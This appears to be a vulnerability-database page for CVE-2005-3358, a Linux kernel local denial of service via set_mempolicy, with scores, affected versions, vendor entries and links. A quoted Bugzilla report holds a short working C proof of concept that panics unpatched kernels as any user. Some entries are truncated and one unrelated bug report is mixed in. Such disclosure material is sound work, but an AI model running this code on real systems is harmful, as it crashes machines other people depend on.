CVE-2005-3358
Published 2005-12-14
Priority P414 · medium · 4.9 (CVSS 2.0)
AV:L/AC:L/Au:N/C:N/I:N/A:C
EXPLOIT
EPSS: 1.01% (58.9th percentile)
Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page fault occurs.
Affected
45 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.14.7 | — |
| linux | linux_kernel | — | — |
CVSS provenance
nvd · v2.0 · 4.9 MEDIUM · AV:L/AC:L/Au:N/C:N/I:N/A:C
vendor_redhat · 4.9 MEDIUM
GHSA
ghsa_unreviewed · 2022-05-01
CVE-2005-3358 [MEDIUM] GHSA-wh6f-4x45-xjrj: Linux kernel before 2
Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page fault occurs.
Red Hat
vendor_redhat · 2005-12-13 · CVSS 4.9
CVE-2005-3358 [MEDIUM] security flaw
Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page fault occurs.
No detection rules found.
Bugzilla
bugzilla · 2018-08-16 · CVSS 4.9
[MEDIUM] CVE-2005-3358 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Linux kernel before 2.6.15 allows local users to cause a denial of service (panic) via a set_mempolicy call with a 0 bitmask, which causes a panic when a page fault occurs.
Bugzilla
bugzilla · 2005-12-13 · CVSS 4.9
[MEDIUM] CVE-2005-3358 panic caused by bad args to set_mempolicy
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.10) Gecko/20050719 Red Hat/1.0.6-1.4.1 Firefox/1.0.6
Description of problem:
Note: since this is easily reproduced by an untrusted user, I am flagging this as a security issue.
Passing a 0 bitmask to set_mempolicy will cause a panic later on when a page fault is triggered. This panic can be triggered by ANY USER. I have only tested this on ia64; however, I do not believe this is platform specific. I do expect, however, that it will only affect platforms where CONFIG_NUMA is set.
The following code will reproduce the panic on ia64 when run as any user.
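```c
/* Header names are missing from the page; these are the ones the calls below need. */
#include <sys/syscall.h>  /* __NR_set_mempolicy */
#include <unistd.h>       /* syscall(), write() */

main(){
	syscall(__NR_set_mempolicy,3,0,0);
	write(1,10,8192);
}
```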
This will cause the panic:
kerne
Bugzilla
bugzilla · 2005-05-11
[MEDIUM] Multiple Kernel vulnerabilities
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Mozilla rulez!)
Description of problem:
Paul Starzetz of iSEC has found yet another bug in binfmt_elf.c. It can be abused to crash the kernel, perhaps even to break into the kernel land. See the advisory for details.
Version-Release number of selected component (if applicable):
How reproducible:
Didn't try
Steps to Reproduce:
Additional info:
I've got a quick and dirty patch. I'll submit it ASAP.
Discussion:
Grr...Bugzilla assigned the bug to [email protected] rather than to
[email protected]
---
Created attachment 114264
The patch for CAN-2005-1263
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
This patch can be applied to FL kernel 2.4.20-43:
402e548b02382c015d6f5e5704370a1ba546598b
li
References
http://linux.bkbits.net:8080/linux-2.6/cset%4042307e9fp8ihEMrfaoPMp_agDevQNA
http://lists.suse.de/archive/suse-security-announce/2006-Feb/0010.html
http://secunia.com/advisories/18216
http://secunia.com/advisories/18510
http://secunia.com/advisories/18788
http://secunia.com/advisories/19038
http://secunia.com/advisories/19374
http://securitytracker.com/id?1015433
http://www.debian.org/security/2006/dsa-1017
http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.15
http://www.novell.com/linux/security/advisories/2006_06_kernel.html
http://www.redhat.com/support/errata/RHSA-2006-0101.html
http://www.securityfocus.com/archive/1/427980/100/0/threaded
http://www.securityfocus.com/archive/1/427981/100/0/threaded
http://www.securityfocus.com/bid/16135
http://www.vupen.com/english/advisories/2006/0035
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=175683
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10410